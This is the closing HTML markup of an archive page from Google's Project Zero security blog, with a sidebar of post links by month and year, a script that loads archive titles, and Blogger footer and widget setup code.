August </a> <span class='post-count' dir='ltr'>(11)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/05/'> May </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/04/'> April </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/03/'> March </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/02/'> February </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2019/01/'> January </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/'> 2018 </a> <span class='post-count' dir='ltr'>(22)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/12/'> December </a> <span class='post-count' dir='ltr'>(7)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/11/'> November </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/10/'> October </a> <span class='post-count' dir='ltr'>(4)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/09/'> September </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/08/'> August </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/07/'> July </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/06/'> June </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/05/'> May </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/04/'> April </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2018/01/'> January </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/'> 2017 </a> <span class='post-count' dir='ltr'>(19)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/12/'> December </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/10/'> October </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/09/'> September </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/08/'> August </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/07/'> July </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/05/'> May </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/04/'> April </a> <span class='post-count' dir='ltr'>(6)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/03/'> March </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2017/02/'> February </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/'> 2016 </a> <span class='post-count' dir='ltr'>(17)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/12/'> December </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/11/'> November </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/10/'> October </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/09/'> September </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/08/'> August </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/07/'> July </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/06/'> June </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/03/'> March </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/02/'> February </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2016/01/'> January </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'> ▼  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/'> 2015 </a> <span class='post-count' dir='ltr'>(33)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/12/'> December </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/11/'> November </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/10/'> October </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/09/'> September </a> <span class='post-count' dir='ltr'>(4)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/08/'> August </a> <span class='post-count' dir='ltr'>(6)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/07/'> July </a> <span class='post-count' dir='ltr'>(5)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/06/'> June </a> <span class='post-count' dir='ltr'>(4)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/05/'> May </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/04/'> April </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/03/'> March </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'> ▼  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/02/'> February </a> <span class='post-count' dir='ltr'>(3)</span> <ul class='posts'> <li><a href='https://googleprojectzero.blogspot.com/2015/02/feedback-and-data-driven-updates-to.html'>Feedback and data-driven updates to Google’s discl...</a></li> <li><a href='https://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html'>(^Exploiting)\s*(CVE-2015-0318)\s*(in)\s*(Flash$)</a></li> <li><a href='https://googleprojectzero.blogspot.com/2015/02/a-tokens-tale_9.html'>A Token’s Tale</a></li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2015/01/'> January </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2014/'> 2014 </a> <span class='post-count' dir='ltr'>(11)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2014/12/'> December </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2014/11/'> November </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2014/10/'> October </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2014/09/'> September </a> <span class='post-count' dir='ltr'>(1)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2014/08/'> August </a> <span class='post-count' dir='ltr'>(2)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://googleprojectzero.blogspot.com/2014/07/'> July </a> <span class='post-count' dir='ltr'>(3)</span> </li> </ul> </li> </ul> </div> </div> <script type='text/javascript'> //<![CDATA[ (function(){ let archive_list = document.getElementById('ArchiveList'); if (archive_list == null) return; let cur_year = archive_list.querySelector('.post-count-link').innerText.trim() - 0; let last_year = 2014; let elements = []; const MONTHS = ',Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec'.split(','); let parent = document.getElementById('ArchiveList'); while (parent.childNodes.length) parent.removeChild(parent.childNodes[0]); function fetch_next_year() { let url = 'https://googleprojectzero.blogspot.com/?action=getTitles&widgetId=BlogArchive1&widgetType=BlogArchive&responseType=js&path=https%3A%2F%2Fgoogleprojectzero.blogspot.com%2F'+cur_year; fetch(url).then(resp => { if (!resp.ok) { console.log('http error'); return; } resp.text().then(text => { let scope = { _WidgetManager: { _HandleControllerResult: (name, method, results) => { elements.push(document.createElement('hr')); let year_header = document.createElement('div'); year_header.appendChild(document.createTextNode(cur_year)); year_header.style.fontSize = 'large'; elements.push(year_header); let list = document.createElement('ul'); elements.push(list); for (let obj of results.posts) { let link_parts = obj.url.split('/'); let year = link_parts[3]; let month = link_parts[4]; let el = document.createElement(/*'div'*/'li'); el.style.listStyleType = 'square'; el.style.listStylePosition = 'inside'; let link = document.createElement('a'); el.appendChild(link); link.appendChild(document.createTextNode(obj.title)); link.href = obj.url; let date_trailer = document.createElement('span'); el.appendChild(date_trailer); //date_trailer.appendChild(document.createTextNode(' ('+year+'-'+month+')')); date_trailer.appendChild(document.createTextNode(' ('+MONTHS[parseInt(month, 10)]+')')); //date_trailer.style.textAlign = 'right'; //elements.push(el); list.appendChild(el); } } } }; with (scope) { eval(text); } if (cur_year == last_year) { finish(); } else { cur_year--; fetch_next_year(); } }); }); } fetch_next_year(); function finish() { for (let obj of elements) { parent.appendChild(obj); } console.log(elements); } })(); //]]> </script> <div class='clear'></div> </div> </div></div> <table border='0' cellpadding='0' cellspacing='0' class='section-columns columns-2'> <tbody> <tr> <td class='first columns-cell'> <div class='sidebar no-items section' id='sidebar-right-2-1'></div> </td> <td class='columns-cell'> <div class='sidebar no-items section' id='sidebar-right-2-2'></div> </td> </tr> </tbody> </table> <div class='sidebar no-items section' id='sidebar-right-3'></div> </aside> </div> </div> </div> <div style='clear: both'></div> <!-- columns --> </div> <!-- main --> </div> </div> <div class='main-cap-bottom cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> <footer> <div class='footer-outer'> <div class='footer-cap-top cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left footer-fauxborder-left'> <div class='fauxborder-right footer-fauxborder-right'></div> <div class='region-inner footer-inner'> <div class='foot no-items section' id='footer-1'></div> <table border='0' cellpadding='0' cellspacing='0' class='section-columns columns-2'> <tbody> <tr> <td class='first columns-cell'> <div class='foot no-items section' id='footer-2-1'></div> </td> <td class='columns-cell'> <div class='foot no-items section' id='footer-2-2'></div> </td> </tr> </tbody> </table> <!-- outside of the include in order to lock Attribution widget --> <div class='foot section' id='footer-3' name='Footer'><div class='widget Attribution' data-version='1' id='Attribution1'> <div class='widget-content' style='text-align: center;'> Powered by <a href='https://www.blogger.com' target='_blank'>Blogger</a>. </div> <div class='clear'></div> </div></div> </div> </div> <div class='footer-cap-bottom cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> </footer> <!-- content --> </div> </div> <div class='content-cap-bottom cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> </div> <script type='text/javascript'> window.setTimeout(function() { document.body.className = document.body.className.replace('loading', ''); }, 10); </script> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/984859869-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY6QXQ5md2i5miX_AGoIaf1rBM3IXw:1732537522118';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d4838136820032157985','//googleprojectzero.blogspot.com/2015/02/','4838136820032157985'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '4838136820032157985', 'title': 'Project Zero', 'url': 'https://googleprojectzero.blogspot.com/2015/02/', 'canonicalUrl': 'https://googleprojectzero.blogspot.com/2015/02/', 'homepageUrl': 'https://googleprojectzero.blogspot.com/', 'searchUrl': 'https://googleprojectzero.blogspot.com/search', 'canonicalHomepageUrl': 'https://googleprojectzero.blogspot.com/', 'blogspotFaviconUrl': 'https://googleprojectzero.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': 'UA-240546891-1', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Project Zero - Atom\x22 href\x3d\x22https://googleprojectzero.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22Project Zero - RSS\x22 href\x3d\x22https://googleprojectzero.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Project Zero - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/4838136820032157985/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/da8f33dd880cc4f1', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Share to X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'archive', 'pageName': 'February 2015', 'pageTitle': 'Project Zero: February 2015'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'Project Zero', 'description': 'News and updates from the Project Zero team at Google', 'url': 'https://googleprojectzero.blogspot.com/2015/02/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2015, 'month': 2, 'rangeMessage': 'Showing posts from February, 2015'}}}]); _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/2646514562-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/1964470060-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'sidebar-right-1', document.getElementById('BlogSearch1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_PageListView', new _WidgetInfo('PageList1', 'sidebar-right-1', document.getElementById('PageList1'), {'title': 'Pages', 'links': [{'isCurrentPage': false, 'href': 'https://googleprojectzero.blogspot.com/p/about-project-zero.html', 'id': '4384467920505278144', 'title': 'About Project Zero'}, {'isCurrentPage': false, 'href': 'https://googleprojectzero.blogspot.com/p/working-at-project-zero.html', 'id': '2459334498880008057', 'title': 'Working at Project Zero'}, {'isCurrentPage': false, 'href': 'https://googleprojectzero.blogspot.com/p/0day.html', 'id': '3414239791814532209', 'title': '0day \x22In the Wild\x22'}, {'isCurrentPage': false, 'href': 'https://googleprojectzero.github.io/0days-in-the-wild/rca.html', 'title': '0day Exploit Root Cause Analyses'}, {'isCurrentPage': false, 'href': 'https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-faq.html', 'id': '2935252455704572784', 'title': 'Vulnerability Disclosure FAQ'}], 'mobile': false, 'showPlaceholder': true, 'hasCurrentPage': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar-right-1', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Loading\x26hellip;'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'footer-3', document.getElementById('Attribution1'), {}, 'displayModeFull')); </script> </body> </html>